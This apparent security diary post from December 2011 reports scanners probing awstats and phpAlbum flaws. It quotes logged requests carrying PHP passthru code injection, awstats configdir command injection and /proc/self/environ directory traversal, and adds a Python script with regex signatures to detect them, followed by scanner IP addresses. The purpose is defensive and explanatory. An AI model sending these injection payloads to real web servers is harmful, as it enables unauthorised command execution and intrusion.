19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up on last Friday's post about the importance of patching, I thought I would update some of the activity we are seeing from the various folks running scans for the awstats vulnerabilities mentioned there. In addition to probing for the various awstats vulnerabilities, the scanners have now added checks for vulnerabilities in phpAlbum that were disclosed on Exploit DB at the end of October.

If you look at the requests made to main.php (below), you can see that the var1 parameter carries a PHP passthru('id') call: the scanner is attempting PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information. That being said, it would seem prudent to upgrade your version of phpAlbum.

Since phpAlbum is frequently used with Joomla installations, this is probably closely related to the similar activity that Ryan Barnett pointed out recently on the SpiderLabs blog. Note that the scanner also attempts a directory traversal against index.php (the ../../proc/self/environ requests below).

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
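
As an added example (not part of the original diary), the Python script below classifies web-server request lines against signatures derived from the probes listed above. The sample input is the set of request lines quoted in this post; the signature labels are my own names, and the regular expressions are my assumption about what distinguishes each probe, not signatures taken from any product or from the scanners themselves.

```python
"""Classify request lines against signatures for the awstats/phpAlbum scanner probes."""
import re
from collections import Counter
from urllib.parse import unquote

# (label, regex over the percent-decoded request target). Labels and patterns are
# assumptions derived from the diary's request lines. Order matters: the specific
# awstatstotals signature must precede the generic {${...}} one.
SIGNATURES = [
    ("phpalbum-var1-code-injection",
     re.compile(r"/main\.php\b.*\bvar1=[^&]*passthru\(", re.I)),
    ("awstats-configdir-command-injection",
     re.compile(r"/awstats\.pl\b.*\bconfigdir=\|", re.I)),
    ("awstatstotals-sort-code-injection",
     re.compile(r"/awstatstotals\.php\b.*\bsort=\{\$\{", re.I)),
    ("generic-php-curly-injection",            # {${...}} in any parameter
     re.compile(r"\{\$\{[^}]*\}\}")),
    ("proc-self-environ-traversal",
     re.compile(r"(\.\./)+.*proc/self/environ", re.I)),
]

# Sample input: the request lines quoted in the diary above, embedded verbatim.
SAMPLE_REQUESTS = """\
GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
"""


def decode_target(line):
    """Return the percent-decoded request target of a 'METHOD /target' line, or None."""
    parts = line.split()
    if len(parts) < 2 or not parts[0].isalpha():
        return None
    # Decode once so encoded (%27.passthru%28) and raw ('.passthru() forms match alike.
    return unquote(parts[1])


def classify(line):
    """Return the first matching signature label, 'unmatched', or None for non-requests."""
    target = decode_target(line)
    if target is None:
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(target):
            return label
    return "unmatched"


def summarize(text):
    """Count classifications over a block of request lines."""
    return Counter(c for c in (classify(l) for l in text.splitlines()) if c)


if __name__ == "__main__":
    for label, n in summarize(SAMPLE_REQUESTS).most_common():
        print(f"{n:3d}  {label}")
```

Decoding before matching is the point: the same phpAlbum probe appears both percent-encoded and raw in the listing, and the awstatstotals payload hides `{${` behind `%7b%24%7b`. The generic curly-brace signature is what catches the site.php variant, which none of the path-specific patterns would name. A single decoding pass is an assumption of this script; a double-encoded request would need a second pass before the patterns apply.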


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166